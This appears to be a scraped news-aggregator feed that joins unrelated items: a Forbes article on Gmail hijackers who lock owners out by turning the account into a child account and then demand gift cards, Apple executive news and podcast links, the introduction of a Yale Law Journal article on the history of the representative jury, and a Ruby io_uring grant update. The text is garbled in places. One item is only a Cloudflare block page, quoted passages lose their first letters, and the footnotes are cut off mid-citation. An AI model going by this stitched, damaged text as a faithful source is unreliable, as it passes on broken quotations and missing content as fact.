I write a lot about Google security, and that which involves the most popular free email platform on the planet, with 2 billion active users, Gmail, in particular. Sure, much of this will focus on the latest vulnerability alerts , and threat campaigns , as well as the occasional compromised Gmail passwords warning. I will always include advice as to how to mitigate the risk of any attack, much of which comes from Google itself. When I hear from readers that they are being locked out of their Gmail account by hackers and are unable to get back in, no matter what, that’s a concern. When Google informs me that it is “looking into it” and will issue specific guidance “in the near future,” that’s even more so. Here’s what you need to know about the Gmail hack attack that prevents you from regaining access to your account, and how to best protect yourself from becoming yet another victim.

Forbes Has Your Gmail Password Been Hacked? Check Now, Here’s How

Hackers Lock Down Compromised Gmail Accounts Using Parent And Child Protections

As regular readers will likely already know, I entered the world of cybersecurity as a hacker in the 1980s. Hacking is not a crime, quite literally so back then, as there were no laws that specifically applied to the act of unauthorised network intrusion. Criminal hacking is quite another thing altogether. So, when I read about a Gmail user who had not only been compromised but found themselves locked out of their account with seemingly no chance of recovery, my hacker brain started to engage. How could this be, I wondered, given that there are so many ways to get account control back, even if an attacker has changed your password post-compromise. And then the chicken clucked, the bell rang, and the penny dropped: this was a very clever bit of hackery involving the use of a feature meant to protect accounts, not hold them hostage.

A Google user posted a plea for help to the Gmail subreddit that explained how an attacker had changed his age to 10 on his account profile and then added it to a family account under the attacker’s control. Ten years old being younger than the account had actually existed for, it is 12 years old apparently, might, you would have hoped, set off some Google alarm bells in these days of advanced AI protections, but no. By adding the compromised account to a family account and making it a child one, the actual owner found themselves totally locked out and unable to use any of the myriad recovery options provided by Google. The icing on this particularly smelly cake was that the attacker then demanded the victim send a bunch of gift cards to get the account released. “TL;DR: Account accessed, placed as a child in a Google family, and locked out,” the victim concluded, “please help.”

As the thread developed, others confirmed that the use of a child account is becoming a common tactic among hackers, and recovering from it appears impossible. “You would think that changing people’s date of birth on their accounts should require a forced re-auth and not be doable without providing all authentication factors,” one wrote, quite sensibly.

Forbes Critical Password Warning As Dangerous ‘Wrench Attacks’ Continue By Davey Winder

Google Is Looking Into Gmail Account Post-Compromise Threat

Perhaps the most astute comment in the subreddit thread was someone suggesting that Google had probably not anticipated such a situation. This does seem likely, although it’s a very unfortunate error if so. I reached out to Google to ask for advice for the victims of this hack attack lockout issue, and a spokesperson told me that the security team was looking into it as a “a known post-compromise action some hijackers take.” Google stressed, however, that it is also a fairly uncommon one. I suspect, however, now that the tactic is becoming known in online forums, that more attackers will deploy it. “Look for more detail and specific guidance from us on this in the near future,” the Google spokesperson said, sharing the following core guidance for stopping account takeovers in the meantime:

  • Turn on two-step verification and adopt passkeys.
  • Double-check that only current/available phones or numbers are associated with accounts, and regularly review what devices are associated with them.
  • Set up recovery information, like a recovery email or phone number, or use the recently announced recovery contacts feature.

Remember, the best way to prevent an attacker from locking you out of your Gmail account in this way is to prevent them from compromising it in the first place. You know it makes sense, so get that Google passkey set up now.

Forbes Google Chrome Security Alert: 3 Billion Users Must Update Now By Davey Winder

Apple’s Succession Intrigue Isn’t Strange at All

Daring Fireball
www.theinformation.com
2025-12-05 23:08:12
Aaron Tilley and Wayne Ma, in a piece headlined “Why Silicon Valley is Buzzing About Apple CEO Succession” at the paywalled-up-the-wazoo The Information: Prediction site Polymarket places Ternus’ odds of getting the job at nearly 55%, ahead of other current Apple executives such as software head...
Original Article

Why have I been blocked?

This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

What can I do to resolve this?

You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Lisa Jackson on The Talk Show Back in 2017

Daring Fireball
daringfireball.net
2025-12-05 22:37:35
This interview was both interesting and a lot of fun. Worth a listen or re-listen.  ★  ...
Original Article

The Talk Show

Apple VP Lisa Jackson

Friday, 21 April 2017

Special guest Lisa Jackson — Apple’s vice president of Environment, Policy, and Social Initiatives — joins the show for an Earth Day discussion of the state of Apple’s environmental efforts: climate change, renewable energy, responsible packaging, and Apple’s new goal to create a “closed-loop supply chain”, wherein the company’s products would be manufactured entirely from recycled materials.

Full transcript of this episode .

Download MP3 .

Sponsored exclusively by:

  • Circle With Disney : Disney’s new way for families to manage content and time across devices. Use code THETALKSHOW to get free shipping and $10 off.

Links:

This episode of The Talk Show was edited by Caleb Sexton.

Copyright © 2002–2025 The Daring Fireball Company LLC.

The Radical Roots of the Representative Jury

Portside
portside.org
2025-12-05 22:32:30
The Radical Roots of the Representative Jury barry Fri, 12/05/2025 - 17:32 ...
Original Article

abstract. For most of American history, the jury was considered an elite institution, composed of “honest and intelligent men,” esteemed in their communities for their “integrity,” “reputation,” or “sound judgment.” As a result, jurors were overwhelmingly male, jurors were overwhelmingly white, and jurors disproportionately hailed from the middle and upper social classes. By the late 1960s, an entirely different, democratic conception of the jury was ascendant: juries were meant to pull from all segments of society, more or less randomly, thus constituting a diverse and representative “cross-section of the community.” This Article offers an intellectual and social history of how the “elite jury” lost its hegemonic appeal, with particular emphasis on the overlooked radicals—anarchists, socialists, Communists, trade unionists, and Popular Front feminists—who battled to remake the jury. This Article offers a novel look at the history and tradition of the American jury, demonstrating how the Sixth Amendment’s meaning was—gradually, unevenly, but definitively—reshaped through several decades of popular struggle, grassroots mobilization, strategic litigation, and social-movement contestation.

author. Professor of Law, University of Virginia School of Law. This project profited greatly from feedback received at faculty workshops at George Washington, Cornell, and Cardozo law schools; the Neighborhood Criminal Law Conference, the Vanderbilt Criminal Justice Roundtable, and the UChicago Constitutional Law Conference; and in the Juries, Race, and Citizenship seminar at Duke Law School. I am particularly indebted to Emily Coward, Daniel Epps, Brandon L. Garrett, Valerie Hans, David Huyssen, Joseph E. Kennedy, Nancy J. King, Anna Lvovsky, Kelly Orians, Mary Reynolds, Jocelyn Simonson, and Brad Snyder. Cyrus Khandalavala and the editors of the Yale Law Journal deserve a special acknowledgment for their diligent work strengthening and sharpening the final product. All errors are mine.


Introduction

In 1975, when the U.S. Supreme Court first held that the Sixth Amendment right to a jury trial necessarily contemplates a jury drawn from a “fair cross section of the community,” the outcome seemed like a “foregone conclusion.” 1 Congress had already declared in 1968 that federal defendants had a statutory right “to grand and petit juries selected at random from a fair cross section of the community,” 2 and the Court was gradually recognizing that “the essential feature of a jury obviously lies . . . in . . . community participation and shared responsibility,” which (“probably”) meant juries large enough to serve as “representative cross-section of the community.” 3 Notably, as it took shape, the Supreme Court’s fair-cross-section doctrine eschewed any focus on discriminatory intent: a jury drawn from an unrepresentative pool generally cannot be “impartial” within the meaning of the Sixth Amendment, regardless of whether the disparities are attributable to a clerk’s discriminatory animus or an accidental computer glitch. 4 True, the Supreme Court has never required any particular petit jury to be perfectly, or even roughly, “representative” of the local community. The Court has repeatedly rejected the suggestion that a defendant might have the right to be judged by jurors sharing some particular identity or trait. 5 But the ideal of the jury that constitutes a fair cross-section of the community—or, what I will generally refer to as the “representative jury” throughout this Article—has triumphed. 6 When a high-profile jury trial occurs, we are accustomed to asking whether the petit jury is representative of the community from which it is drawn. 7 Americans expect, and want, juries to mirror the demographics of the community—if not in every case, at least in the aggregate. 8

But this conception of the jury, now common sense, is new. In 1925, only a handful of radicals would have recognized it. 9 Indeed, for most of American history, juries were not “cross-sections” of the community, nor were they legally required to be “representative” in any meaningful sense. Most jurisdictions limited jury service to “honest and intelligent men . . . esteemed in the community for their integrity, good character and sound judgment.” 10 Judges, jury commissioners, and “key men” tasked with identifying suitable jurors populated their lists with upstanding citizens who, in their minds, satisfied these subjective statutory requirements and were “above average” in every regard. The predictable result: jurors were men, jurors were white, and jurors disproportionately hailed from the middle and upper social classes. 11 As Judge Learned Hand wrote in 1950, defendants could repeat the phrase “cross-section” ad nauseum, but it was “idle to talk of the justness of a sample, until one knows what is the composition of the group which it is to represent.” 12 Historically, jurors were citizens possessing “intelligence, character and general information,” so if a method of summoning jurors “resulted in weighting the list with the wealthy” (a disproportionate number of whom supposedly boasted such qualities), surely it could not be unlawful. 13 More recently, Justice Thomas has made a related point: the constitutional requirement that juries be drawn from a representative cross-section of the community “seems difficult to square with the Sixth Amendment’s text and history.” 14 The representative jury is not the inheritance of some unbroken tradition, but rather a deliberate, relatively recent departure from it.

To be sure, the democratic promise of a jury as a body of one’s “peers” dates to the Magna Carta. “urors and voters were conceptualized as complementary legislators” at the Founding, 15 with the jury box giving “the common people [as jurors]” a mechanism to wield control in the judiciary. 16 Throughout the nineteenth century, criminal defendants, often racial minorities and women, protested that unrepresentative juries denied them their basic constitutional rights. 17 But the “elite jury” still reigned. 18 In American law and culture, little incongruity existed between the idea of a “jury of one’s peers” (or the “impartial” jury guaranteed by the Sixth Amendment) and the dominant practice of elite juries. 19 And democratizing the jury box by taking affirmative steps to include those who lacked the superior qualities expected of jurors struck many as nonsensical. 20 So, what changed? How did our popular, common-sense understanding of the jury shift so dramatically over such a short period of time?

There are standard ways of answering these questions. The most superficial might stress the relatively late dates of landmark Supreme Court cases democratizing the jury— Taylor v. Louisiana in 1975 and Batson v. Kentucky in 1986, for example—and view these opinions exclusively as downstream (and belated) fruits of “the civil rights movement of the 1960s ca up with the jury.” 21 On this view, the law of the jury is something of a backwater, with the most important civil-rights developments occurring in the realms of public education, voting, employment, or public accommodations. A more nuanced, though still top-down, doctrinal account might locate the seeds of the Supreme Court’s mature “fair-cross-section” jurisprudence in cases decided somewhat earlier. 22 In 1940, for example, responding to an egregious record of racial exclusion of Black jurors in Harris County, Texas, Justice Black asserted for the majority, without citation, that “t is part of the established tradition in the use of juries as instruments of public justice that the jury be a body truly representative of the community.” 23 In subsequent cases, dicta endorsing “the concept of the jury as a cross-section of the community” began appearing in Supreme Court opinions. 24 On occasion, the Court used its supervisory power to vacate federal criminal convictions where incontrovertible evidence established that wage earners 25 or women 26 had been improperly excluded from jury service as a class. After the Warren Court incorporated the right to trial by jury against the states in 1968, 27 it was only a matter of time before dicta from these earlier cases—and the inchoate democratic principles they articulated—crept into constitutional criminal procedure.

Looking beyond the Supreme Court, however, offers a far richer answer. From such a perspective, this Article argues that the “elite jury” lost its hegemonic appeal in significant part due to a forgotten struggle to democratize the American jury—beginning decades before what is classically viewed as the heyday of the Civil Rights Movement. 28 The protagonists of this story include not only litigators affiliated with well-known organizations like the NAACP and the ACLU, but also left-wing radicals—anarchists, Communists, socialists, trade unionists, and Popular Front feminists—who recognized the jury box as an important battleground in overthrowing capitalism, dismantling white supremacy, and expanding the horizons of twentieth-century American democracy. Their battle to remake the jury was waged not only in the courtroom but also through confrontational “mass defense” campaigns in the streets, often at substantial personal risk. Lawyers who raised jury-discrimination claims risked lynching and professional ruin; protestors supporting their efforts were sometimes met with police truncheons and tear gas. 29 In the short term, their combined efforts achieved mixed results in individual cases—but they were effective in exposing the yawning gap between America’s rhetoric of equal citizenship and the criminal-legal system’s inegalitarian reality. In the long run, they played a critical role in transforming a core American institution.

This Article’s basic aim, then, is to recover the role of nonelite, nonstate actors—radical lawyers, civil-rights organizers, labor activists, and excluded juror-citizens themselves—in enduring forms of lawmaking. The central contribution of this Article is not simply that the Supreme Court’s fair-cross-section jurisprudence reflects the ideological contribution of socialists or Communists, actors often regarded as external or even hostile to American democracy. 30 Nor does this Article contend that radical activists were the representative jury’s sole architects; the fair-cross-section requirement was propelled by a broad array of social, political, and legal developments alongside those this Article foregrounds. 31 Instead, this Article demonstrates that these radical litigants and the masses they mobilized—and, in particular, their engagements with the legal institutions they viewed with profound skepticism—comprise a missing and indispensable vantage point from which to understand the doctrine’s development. Following Lani Guinier and Gerald Torres, this Article’s genealogy of the fair-cross-section doctrine is offered as a “demosprudential” case study in how popular participation and collective action—not just courts or legislatures—influenced cultural understandings of the jury, the development of legal norms, and, eventually, constitutional law. 32 Put slightly differently, while radical lawyers and high-profile criminal cases play an important role in this story, this Article is fundamentally concerned with how the Sixth Amendment’s meaning was—gradually, unevenly, but definitively—reshaped through several decades of popular struggle, grassroots mobilization, strategic litigation, and social-movement contestation.

This Article proceeds in five parts. Part I is a prelude of sorts, briefly introducing the American jury circa 1925. It surveys the state of the law, the composition of juries in the real world, and the increasingly contested social understandings of what the jury ought to be. During the 1920s, the embattled American labor movement modeled an alternative vision of the jury: in high-profile trials, unions would deploy racially diverse “labor juries” to monitor proceedings from the audience, eventually deliberating and rendering their own verdicts (which often conflicted with those returned by the bourgeois juries of the courts). 33 The post-World War I crackdown on Communists, anarchists, and other labor radicals, Part I argues, helped crystallize the importance of public “mass defense” campaigns and heightened the salience of jury-selection practices to those struggling to transform American society. Toward the decade’s end, as Communists came to recognize that white Southerners were “us the criminal justice system to enforce their political economy,” 34 the jury box became a central battleground for larger fights over citizenship, white supremacy, and economic inequality.

Part II focuses on the work of the International Labor Defense (ILD), a Communist-backed “mass defense” organization that emerged from the labor battles surveyed in Part I. While the ILD’s efforts on behalf of the Scottsboro Boys in Alabama are well known, 35 its other major cases from the era have been overlooked, and the organization’s critical role in repeatedly pressing jury-discrimination claims, including in the Scottsboro case itself, has received no scrutiny whatsoever. Across the country, from Maryland 36 to Georgia, 37 the ILD established itself as the country’s most militant champion of Black citizens’ rights in the early 1930s, in significant part by scoring key legal victories against the all-white jury. 38 Apart from demonstrating that such legal claims could be successfully brought, even in the Deep South, the Communists’ daring assaults on the all-white jury—and their inflammatory denunciations of their rivals—prodded more established groups like the NAACP to begin raising similar challenges, too. 39 But in the early years, it was the ILD that forced open a space for jury-discrimination claims in both the courts and the country’s political imagination—often through confrontational “mass defense” tactics that the NAACP eschewed.

Part III turns to the prosecution and ultimate execution of Odell Waller, a Black sharecropper who shot and killed his white landlord in 1940. There are no historical markers commemorating Waller’s case in the town of Gretna, Virginia, today, but at the time, Waller was a household name across America. On the eve of his execution in 1942, Harlem went dark as residents turned out their lights in protest, and twenty thousand supporters rallied to save his life inside Madison Square Garden. 40 Behind the scenes, Eleanor Roosevelt was lobbying Justice Frankfurter on Waller’s behalf, and President Franklin D. Roosevelt secretly appealed to Virginia’s governor to spare his life. 41 In many ways, the campaign to save Waller resembled the ILD’s efforts described in Part II: Waller was originally defended by a tiny Trotskyite group and later by the more mainstream socialists of the Workers Defense League (WDL); organizers embraced a “mass defense” strategy, litigating their cause both in court and in the streets; and the appeals in the capital case turned on a jury-discrimination claim. But whereas the ILD’s campaigns in the 1930s focused exclusively on race, Odell Waller’s appeals challenged Virginia’s use of “poll-tax juries,” which excluded both Black and poor white citizens. The unprecedented use of the Equal Protection Clause to attack wealth-based legal discrimination thus advanced a more capacious understanding of what it meant for a jury to reflect a “fair cross-section of the community.” And it put a national spotlight on Virginia’s longstanding practice of limiting the political rights of the poor, raising uncomfortable questions about the United States’s commitment to democracy at home as the country geared up to fight totalitarianism abroad. 42

On the other side of World War II, jury-selection practices once again played a central role in the country’s highest-profile trial: the 1948-1949 conspiracy prosecution of the leaders of the Communist Party USA (CPUSA). Part IV revisits the Foley Square Trial, today best remembered as a landmark free-speech case in which the Supreme Court upheld the Smith Act against a First Amendment challenge. 43 But for its first eight weeks, the prosecution was derailed by the most comprehensive challenge to jury-selection practices ever seen in an American courtroom, going far beyond the type of discrimination claims at issue in Parts II and III. The Communists alleged that the ad hoc method of summoning jurors in the Southern District of New York (SDNY) resulted in the unconstitutional underrepresentation of the “poor” and “propertyless”; manual workers; residents of “low rent” neighborhoods; “Negroes and other racial and national minorities”; women; Communists; and a variety of other groups. 44 In effect, the Communists asserted a constitutional right to a jury that was a true cross-section of New York, and they compiled droves of evidence demonstrating how SDNY’s juries fell short of this ideal. Once again, the proponents of the representative jury lost the immediate battle. The Communists’ “attack on the jury system,” however, gave pause to even the most anti-Communist liberals and effectively prefigured the model of random jury selection that would become federal law within two decades’ time. 45

Part V concludes by returning to Alabama, thirty years after the Scottsboro Boys’ convictions were vacated on jury-discrimination grounds, to reexamine another landmark case in the ascendance of the representative jury: White v. Crook . 46 While the campaigns and litigation examined in Parts II through IV had done a great deal to democratize the jury box, women were still regularly excluded from the “cross-section of the community” that juries were meant to reflect. Gardenia White, a Black female activist in “Bloody” Lowndes County, Alabama, served as lead plaintiff in a 1965 class-action lawsuit that aimed to change that. The litigation was pathbreaking in multiple regards: (1) the lawsuit was the first time that prospective jurors themselves, as opposed to defendants, had sued to vindicate their own rights as jurors, and (2) the plaintiffs advanced the novel argument that the Equal Protection Clause barred discrimination based on race and sex. 47 The animating theory—that sex-based discrimination and race-based discrimination were not only analogous, but interrelated forms of subordination 48 —echoed arguments unsuccessfully advanced by Odell Waller twenty-five years earlier, and for good reason. The Alabama litigation was the brainchild of a queer Black lawyer, Pauli Murray, whose decision to enroll at Howard Law School was prompted by her work as the WDL’s lead field organizer on the Waller campaign. 49 In early 1966, a three-judge panel sided with Murray and White; it was the first time a federal court had held that sex-based discrimination violated the Equal Protection Clause.

Linking these cases and campaigns, in addition to a recurring cast of key figures, is the enduring influence of a particular form of grassroots American radical politics—sometimes labeled Popular Frontism—that emerged as a mass social movement in the 1930s. 50 More than an ephemeral liberal-left political alliance against European fascism, 51 the Popular Front took shape as “a radical social-democratic movement forged around anti-fascism, anti-lynching, and . . . industrial unionism.” 52 It emerged in nascent forms in the United States before Moscow abandoned the ultrasectarian posturing of the Soviet Union’s Third Period in the early 1930s, 53 and it endured long after the Popular Front nominally ended by 1940. 54 For the people who shaped and were shaped by its culture, the Popular Front promoted

support for a multiracial American national identity [cast by] people of color, immigrants and radicals . . . insistence that political and labor movements be grassroots and rank-and-file led . . . and adherence to a revolutionary politics based in multiracial and cross-class campaigns for race, gender, and economic justice, simultaneously. 55

And, in many ways, the campaigns and political program of the ILD (discussed in Part II) served not only as “the heart of the political and artistic energies of the proletarian avant-garde” of the 1930s, 56 but also provided strategies and an ethos that reverberated in legal fights over the subsequent decades. 57 It should come as no surprise, then, that the figures who emerged later in this history had formative political experiences in the jury struggles that preceded them. The roots of the representative jury are found in the democratic and egalitarian soil of this political milieu, which shaped the worldview and lives of so many of this Article’s protagonists. 58

The primary focus of this Article is to track how these efforts reshaped the American jury, but it also illuminates how fights over the jury box prefigured and sometimes directly influenced developments in other areas of American law. When Euel Lee’s Communist lawyer persuaded Maryland’s high court to vacate his murder conviction in 1931, for example, Lee successfully argued that the implicit biases of the white judge who compiled the jury lists rendered the process unlawful, decades before such terminology would enter popular usage. 59 Thurgood Marshall—who, as a recent law-school graduate, was tangentially involved in the case—would use strikingly similar language fifty-five years later in arguing for the abolition of race-based peremptory strikes in Batson v. Kentucky . 60 The jury challenge made by the Communists in the Foley Square Trial essentially anticipated the modern fair-cross-section doctrine that would solidify within two decades’ time. And, as mentioned above, the Waller and White cases both involved groundbreaking attempts to expand the scope of the Equal Protection Clause to classifications based on wealth and sex, respectively. Though largely forgotten today, feminist activists regarded the latter as the “ Brown v. Board of Education for women” when it was first issued. 61 Far from a backwater, throughout the twentieth century, the law of the jury served as a key battleground for those contesting the subordination of workers, racial minorities, and women. It provided a foundational site of struggle for those who understood all three phenomena as intertwined features of American political economy.

1 Taylor v. Louisiana, 419 U.S. 522, 527, 535 (1975).

2 Jury Selection and Service Act of 1968, Pub. L. No. 90-274, § 101, 82 Stat. 53, 54 (codified at …

3 Williams v. Florida, 399 U.S. 78, 100 (1970).

4 Duren v. Missouri, 439 U.S. 357, 371 (1979) (Rehnquist, J., dissenting) (“nder Sixth Amendmen…

5 See, e.g. , Holland v. Illinois, 493 U.S. 474, 483 (1990); Taylor , 419 U.S. at 538; Fay v. New Yor…

6 See, e.g. , People v. Wheeler, 583 P.2d 748, 759-60, 762 (Cal. 1978) (“he goal of an impartial…

7 See, e.g. , Calder McHugh, How Much Do We Really Know About the Trump Jury? , Politico Mag. (Apr. 1…

8 Philip Bump, The Chauvin Jurors Deserve Better than Partisan Armchair Assessments of Their Decisio…

9 See Jeffrey Abramson, We, the Jury: The Jury System and the Ideal of Democracy 99 (1994) (“The c…

10 Ala. Code § 8603 (1923); see also Hale, supra note 9, at 140 (“In the traditional view, jurors…

11 See infra notes 87-112 and accompanying text.

12 United States v. Dennis, 183 F.2d 201, 224 (2d Cir. 1950).

14 Berghuis v. Smith, 559 U.S. 314, 334 (2010) (Thomas, J., concurring).

15 Richard M. Re, Re-Justifying the Fair Cross Section Requirement: Equal Representation and Enfranch…

16 Jenny E. Carroll, The Jury as Democracy , 66 Ala. L. Rev. 825, 831 n.15 (2015) (quoting 2 Charles F…

17 See, e.g. , Thomas Ward Frampton, The First Black Jurors and the Integration of the American Jury ,…

18 See Abramson, supra note 9, at 108.

19 For a rough contemporary analogue, many would recognize the federal legislature as “representati…

20 See, e.g. , Veto It , Oregonian, Mar. 4, 1937, at 10 (“It is said . . . that the regi…

21 Abramson, supra note 9, at 117 (“Matters stood in this mixed position until the civil rights mov…

22 Hale, supra note 9, at 193-206; Abramson, supra note 9, at 99-142. An important exception—one of…

23 Smith v. Texas, 311 U.S. 128, 130 (1940).

24 See, e.g. , Glasser v. United States, 315 U.S. 60, 86 (1942).

25 See Thiel v. S. Pac. Co., 328 U.S. 217, 225 (1946).

26 See Ballard v. United States, 329 U.S. 187, 193 (1946).

27 Duncan v. Louisiana, 391 U.S. 145, 149 (1968).

28 On historical accounts adopting a “long civil rights movement” perspective, see, for example, …

29 See infra notes 135, 148, 185, 196, 213, 348 and accompanying text; see also Gilbert King, Devil i…

30 To be sure, the frequency with which radical litigants played a key role in important and high-pro…

31 To offer just one example, the advent of scientific polling techniques in the late 1930s, coupled …

32 See Lani Guinier & Gerald Torres, Changing the Wind: Notes Toward a Demosprudence of Law and Socia…

33 See infra notes 66-77, 128-138 and accompanying text.

34 Gilmore, supra note 28, at 99.

35 See, e.g. , id. at 106-56. See generally James Goodman, Stories of Scottsboro (1994) (providing the…

36 See infra Section II.A.

37 See infra Section II.B.

38 See infra notes 144-244 and accompanying text.

39 See infra notes 249-257 and accompanying text.

40 See infra notes 316-320 and accompanying text.

41 See infra notes 330-334 and accompanying text.

42 See generally Mary L. Dudziak, Cold War Civil Rights: Race and the Image of American Democracy (20…

43 Dennis v. United States, 341 U.S. 494, 516 (1951) (holding that the First Amendment does not exten…

44 Joint Appendix at *13038-39, United States v. Dennis, 183 F.2d 201 (2d Cir. 1950) (No. 242).

45 See Jury Selection and Service Act of 1968, Pub. L. No. 90-274, § 101, 82 Stat. 53, 54-56 (codif…

46 251 F. Supp. 401 (M.D. Ala. 1966).

47 See infra notes 471-478 and accompanying text.

48 See Serena Mayeri, Reasoning from Race: Feminism, Law, and the Civil Rights Revolution 3-4 (2011).

49 See infra notes 339-341 and accompanying text. I use she/her pronouns for Pauli Murray in this pie…

50 See Reynolds, supra note 28, at 2-3.

51 See Joseph Fronczak, Everything is Possible 185 (2023) (“The older historiographical answer, sha…

52 Michael Denning, The Cultural Front: The Laboring of American Culture in the Twentieth Century, at…

53 Barrett, supra note 51, at 533 (“The Popular Front strategy had been evolving on a local and nat…

54 See Denning, supra note 52, at 21-27, 463-72 (discussing periodization); Reynolds, supra note 28, …

55 Reynolds, supra note 28, at 3.

56 Denning, supra note 52, at 66.

57 Id. at 125 (“he Popular Front combined three distinctive political tendencies: a social democ…

58 Those figures include Ben Davis, Jr., profiled in Parts II and IV, and Pauli Murray, profiled in P…

59 See infra Section II.A; see also B. Keith Payne & Bertram Gawronski, A History of Implicit Social …

60 See Batson v. Kentucky, 476 U.S. 79, 106 (1986) (Marshall, J., concurring).

61 See infra text accompanying note 498.

For over a century, the Yale Law Journal has been at the forefront of legal scholarship, sparking conversation and encouraging reflection among scholars and students, as well as practicing lawyers and sitting judges and Justices.

Apple Announces a Few Other Executive Transitions

Daring Fireball
www.apple.com
2025-12-05 22:18:12
Apple Newsroom, yesterday: Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting...
Original Article
opens in new window
PRESS RELEASE December 4, 2025

Apple announces executive transitions

Jennifer Newstead to join Apple as senior vice president, will become general counsel in March 2026

Kate Adams to retire late next year

Lisa Jackson to retire

CUPERTINO, CALIFORNIA Apple today announced that Jennifer Newstead will become Apple’s general counsel on March 1, 2026, following a transition of duties from Kate Adams, who has served as Apple’s general counsel since 2017. She will join Apple as senior vice president in January, reporting to CEO Tim Cook and serving on Apple’s executive team.
In addition, Lisa Jackson, vice president for Environment, Policy, and Social Initiatives, will retire in late January 2026. The Government Affairs organization will transition to Adams, who will oversee the team until her retirement late next year, after which it will be led by Newstead. Newstead’s title will become senior vice president, General Counsel and Government Affairs, reflecting the combining of the two organizations. The Environment and Social Initiatives teams will report to Apple chief operating officer Sabih Khan.
“Kate has been an integral part of the company for the better part of a decade, having provided critical advice while always advocating on behalf of our customers’ right to privacy and protecting Apple’s right to innovate,” said Tim Cook, Apple’s CEO. “I am incredibly grateful to her for the leadership she has provided, for her remarkable determination across a myriad of highly complex issues, and above all, for her thoughtfulness, her deeply strategic mind, and her sound counsel.”
“I am deeply appreciative of Lisa’s contributions. She has been instrumental in helping us reduce our global greenhouse emissions by more than 60 percent compared to 2015 levels,” said Cook. “She has also been a critical strategic partner in engaging governments around the world, advocating for the best interests of our users on a myriad of topics, as well as advancing our values, from education and accessibility to privacy and security.”
“We couldn’t be more pleased to have Jennifer join our team,” said Cook. “She brings an extraordinary depth of experience and skill to the role, and will advance Apple’s important work all over the world. We are also pleased that Jennifer will be overseeing both the Legal and Government Affairs organizations, given the increasing overlap between the work of both teams and her substantial background in international affairs. I know she will be an excellent leader going forward.”
“I have long admired Apple’s deep focus on innovation and strong commitment to its values, its customers, and to making the world a better place,” said Newstead. “I am honored to join the company and to lead an extraordinary team who are dedicated each and every day to doing what’s in the best interest of Apple’s users.”
“It has been one of the great privileges of my life to be a part of Apple, where our work has always been about standing up for the values that are the foundation of this great company,” said Adams. “I am proud of the good our wonderful team has done over the past eight years, and I am filled with gratitude for the chance to have made a difference. Jennifer is an exceptional talent and I am confident that I am leaving the team in the very best hands, and I’m really looking forward to working more closely with the Government Affairs team.”
“Apple is a remarkable company and it has been a true honor to lead such important work here,” said Jackson. “I have been lucky to work with leaders who understand that reducing our environmental impact is not just good for the environment, but good for business, and that we can do well by doing good. And I am incredibly grateful to the teams I’ve had the privilege to lead at Apple, for the innovations they’ve helped create and inspire, and for the advocacy they’ve led on behalf of our users with governments around the world. I have every confidence that Apple will continue to have a profoundly positive impact on the planet and its people.”
Newstead was most recently chief legal officer at Meta and previously served as the legal adviser of the U.S. Department of State, where she led the legal team responsible for advising the Secretary of State on legal issues affecting the conduct of U.S. foreign relations. She held a range of other positions in government earlier in her career as well, including as general counsel of the White House Office of Management and Budget, as a principal deputy assistant attorney general of the Office of Legal Policy at the Department of Justice, as associate White House counsel, and as a law clerk to Justice Stephen Breyer of the U.S. Supreme Court. She also spent a dozen years as partner at Davis Polk & Wardwell LLP, where she advised global corporations on a wide variety of issues. Newstead holds an AB from Harvard University and a JD from Yale Law School.
Stay up to date with the latest articles from Apple Newsroom.

OSS Friday Update - The Shape of Ruby I/O to Come

Lobsters
noteflakes.com
2025-12-05 22:12:36
Comments...
Original Article

05·12·2025

I’m currently doing grant work for the Japanese Ruby Association on UringMachine , a new Ruby gem that provides a low-level API for working with io_uring . As part of my work I’ll be providing weekly updates on this website. Here’s what I did this week:

  • Last week I wrote about the work I did under the guidance of Samuel Williams to improve the behavior of fiber schedulers when forking. After some discussing the issues around forking with Samuel, we decided that the best course of action would be to remove the fiber scheduler after a fork. Samuel did work around cleaning up schedulers in threads that terminate on fork , and I submitted a PR for removing the scheduler from the active thread on fork, as well as resetting the fiber to blocking mode. This is my first contribution to Ruby core!

  • I Continued implementing the missing fiber scheduler hooks: #fiber_interrupt , #address_resolve , #timeout_after . For the most part, they were simple to implement. I probably spent most of my time figuring out how to test these, rather than implementing them. Most of the hooks involve just a few lines of code, with many of them consisting of a single line of code, calling into the relevant UringMachine low-level API.

  • Implemented the #io_select hook, which involved implementing a low-level UM#select method. This method took some effort to implement, since it needs to handle an arbitrary number of file descriptors to check for readiness. We need to create a separate SQE for each fd we want to poll. When one or more CQEs arrive for polled fd’s, we also need to cancel all poll operations that have not completed.

    Since in many cases, IO.select is called with just a single IO, I also added a special-case implementation of UM#select that specifically handles a single fd.

  • Implemented a worker pool for performing blocking operations in the scheduler. Up until now, each scheduler started their own worker thread for performing blocking operations for use in the #blocking_operation_wait hook. The new implementation uses a worker thread pool shared by all schedulers, with a worker count limited to CPU count. Workers are started when needed.

    I also added an optional entries argument to set the SQE and CQE buffer sizes when starting a new UringMachine instance. The default size is 4096 SQE entries (liburing by default makes the CQE buffer size double that of the SQE buffer). The blocking operations worker threads specify a value of 4 since they only use their UringMachine instance for popping jobs off the job queue and pushing the blocking operation result back to the scheduler.

  • Added support for file_offset argument in UM#read and UM#write in preparation for implementing the #io_pread and #io_pwrite hooks. The UM#write_async API, which permits writing to a file descriptor without waiting for the operation to complete, got support for specifying length and file_offset arguments as well. In addition, UM#write and UM#write_async got short-circuit logic for writes with a length of 0.

  • Added support for specifying buffer offset in #io_read and #io_write hooks, and support for timeout in #block , #io_read and #io_write hooks.

  • I found and fixed a problem with how futex_wake was done in the low-level UringMachine code handling mutexes and queues. This fixed a deadlock in the scheduler background worker pool where clients of the pool where not properly woken after the submitted operation was done.

  • I finished work on the #io_pread and #io_pwrite hooks. Unfortunately, the test for #io_pwrite consistently hangs (not in IO#pwrite itself, rather on closing the file.) With Samuel’s help, hopefully we’ll find a solution…

  • With those two last hooks, the fiber scheduler implementation is now feature complete!

Why is The Fiber Scheduler Important?

I think there is some misunderstanding around the Ruby fiber scheduler interface. This is the only Ruby API that does not have a built-in implementation in Ruby itself, but rather requires an external library or gem. The question has been raised lately on Reddit, why doesn’t Ruby include an “official” implementation of the fiber scheduler?

